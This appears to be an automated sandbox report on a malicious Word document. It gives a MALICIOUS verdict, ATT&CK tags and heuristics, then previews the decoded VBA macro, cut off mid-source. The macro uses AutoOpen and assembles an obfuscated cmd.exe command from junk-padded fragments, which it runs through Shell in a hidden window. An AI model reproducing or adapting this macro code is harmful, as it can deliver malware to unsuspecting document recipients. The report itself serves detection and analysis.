Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen procedure, a common initial-execution technique. The macro's primary function appears to be downloading and executing a second-stage payload: it assembles a command string from many concatenated fragments returned by helper functions and passes it to Shell with a hidden window. The ClamAV detection further confirms its malicious nature.
Heuristics (5):
- ClamAV: Doc.Malware.Valyria-6775505-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6775505-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 79d4aceb7cbc3fe654258c92bd622aa84a25d9672b545b2bc989b9057acf0142) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31588 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "mwDiRYBkwsuFz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
ddHvM = 943
KHdjdn = kbiFqN
dvUpBz = Round(45)
JEiLOZ = ChrB(KTuYJu - QutOc)
RNOqCtXTTZl = "" + RcPMHflpDnlML + AHCBJdDClBo + CVar("cm") + jJbUSRMDO + FpoBDbYACw + wjfzzIuP + JwtHwK + qltazh + pdOcMM + tHoYjDZ + KbLLA + zYiIh + zbNSMHc + cfkbqkkC + NGcRbhvv + zYiGjMYj + zwRczS + lSuQiQ + ViSoVQcXvK + JTPII + LmtwwY + jHMwwrf + tRnbwzTv + wvrdXpU + aiWtcbqYfl + IMtSwTN + FUlNZnWV + tiJYUz + oqvLFRFbOO + SZpsN + cFAvnlSLO + bczZAts + jvhYqId + UILvuz + WpfVkbzK + QmwGAATJVm + MAozvJfEQ + uazPLLDcw + AZmFa + SVzWt + amOSfmi + XvCZQEaKwX + lMqiAwMbYwk + LtIVlYcjtQ + tpAWh + YDUREz + hOZVRQjGwdjPG + fHrKdGoVT
IOWMaU = fNJjYt
Shell@ RNOqCtXTTZl, 0
QwDQWl = Hex(JuIwz * stFNlI * 39968 / lDPiaw)
End Sub
Attribute VB_Name = "izKSTYWQqIXLMS"
Function wjfzzIuP()
On Error Resume Next
UmMilN = "d "
wlkBIzA = " /c" + " " + " c"
qhpMAIbv = "mD.Ex" + "e /V:O /R" + " " + CStr(Chr(EhzMDKiIrCR + hXtlqiqVIVa + 34 + UJQqsiavVsBMsV + UPaVNYPwjWA)) + " " + "set ~'" + "{=-"
EIXnIP = 135976746
AjwnbksZNA = "_\--/" + "_-///\\__ " + "/__\" + "\_\-_/-/-"
ZGuJn = MbSiaj
PZtbY = Hex(nJmwmz * OOjWI - zLaFj / PBwpO)
zvuzpK = "\/ _" + "/_" + "-/_-/-_\" + "-/\\ \\--" + "//_-\"
hjzYJW = HqicR
GUEtY = CStr(608)
tIHmGq = CSng(MoUJT * qoUYY)
kCfiZLaKSs = "__/\-_" + " _\\_////\" + "--_\-" + "- \_/-__" + "-\/_-\\" + "/-" + " \-\"
NNKzZ = 7308
GpdiDl = CDbl(KCHDMk)
EoNjNHJcVFz = "\_-/_" + "_///\"
GDVzQF = oimUO
Awjiwm = CLng(HzGNNP / 30354)
NdGOi = "-- /" + "_\/-/-\" + "_-\-/__ " + "\-//_//_" + "--\\"
wjfzzIuP = UmMilN + wlkBIzA + qhpMAIbv + AjwnbksZNA + zvuzpK + kCfiZLaKSs + EoNjNHJcVFz + NdGOi
MRsdiU = fYGzG
End Function
Function JwtHwK()
On Error Resume Next
rfulv = CDate(7)
ozTRs = 433986341
sWfArGkIz = "_\_ _" + "-\\-_-\" + "//" + "/_/-" + "_ _\-/-/" + "_\/-\_/-_" + " \__"
QzFRXw = 40
hBXMA = Round(WlMYDX)
PzizMG = "\--////\" + "\-__ -" + "/\" + "__/\/" + "-\\-" + "__/ -"
WPRLHt = Chr(78592 + NAOujd)
hXCaNj = YBTGZw
ijXoHv = "__/\\-/" + "-_\\/-_"
mMqowV = 457109648
aJZmN = " /---\\/\"
NGszQs = "\/-___" + "/ //" + "_\-" + "\/_--"
vZwwanVWN = "/_\" + "_" + "\ /" + "/" + "_-" + "-\_\_-\/"
EYuHJr = mvXjwd
LuHjK = Oct(vsYoZz - PuZFLm)
zCDqR = CDate(9615)
jLdYuL = "-_\" + " " + "/\__\-" + "-/" + "_/-\\-/}\" + "\__//"
kGAzsGoO = "_//-\--" + "-\}-/\\"
JwtHwK = sWfArGkIz + PzizMG + ijXoHv + aJZmN + NGszQs + vZwwanVWN + jLdYuL + kGAzsGoO
hkzRz = Tan(JvKOz)
End Function
Function qltazh()
On Error Resume Next
DQzprAiv = "\\/__--//"
iijYHW = Oct(YBvBF * RqCKvL * 8166 * bnUun)
jZHELSww = "_-" + "{-" + "_-\_//\-"
vsoJzs = Sin(QFMMH)
IAvWSIMwl = "-\/\_/h/\/" + "-\_-/-/__\" + "-_" + "c_-_/__-" + "/\/\"
EiwzPs = ChrW(95856402)
dUHOb = CMvfY
QrnsE = Atn(13888 + EtYZD)
kMlRJzOLZp = "\-\/" + "t_-/" + "\\/_" + "-_-\/\/" + "-a-/--_" + "//\-\\\_"
TSUwV = Hex(bKKHHa)
FshcAE = Rnd(4)
AWuqr = Fix(vlXpME)
lVnOqF = "/_c_\-/" + "_\_/\--\/" + "/_}" + "/-\_\\" + "//_-" + "\"
IwtUhVi = "-__/;" + "\//-" + "--"
UjWsaBnzU = "\_" + "/" + "_/\_-_k"
kOOQK = CInt(445)
JlJhnYi = "-_-/" + "/\_" + "_/\\_"
zOEmYoRscHB = "/\-" + "a" + "\--_-\\" + "/__/_-/\" + "e/-__\\_-" + "-/\\/-" + "_r/\---"
qltazh = DQzprAiv + jZHELSww + IAvWSIMwl + kMlRJzOLZp + lVnOqF + IwtUhVi + UjWsaBnzU + JlJhnYi + zOEmYoRscHB
mnlzj = Chr(86867 - VfAWcu)
tSAJM = ChrB(FzBZUX)
icptF = ChrW(65415 * izGsD)
End Function
Function pdOcMM()
On Error Resume Next
MopHLAi = "_\\//\__"
AvEUl = Atn(57836535)
ajtOU = Sqr(501637661)
vajHondzhbt = "_-b\_" + "_/\"
nkkjq = 468
hlBwM = Sin(tUikX)
wjSKMVsizfC = "_/\/"
cRJSXIQ = "----\" + "/;-\_//" + "/_-\-\_-_\"
pdOcMM = MopHLAi + vajHondzhbt + wjSKMVsizfC + cRJSXIQ
iiuqXl =
... (truncated)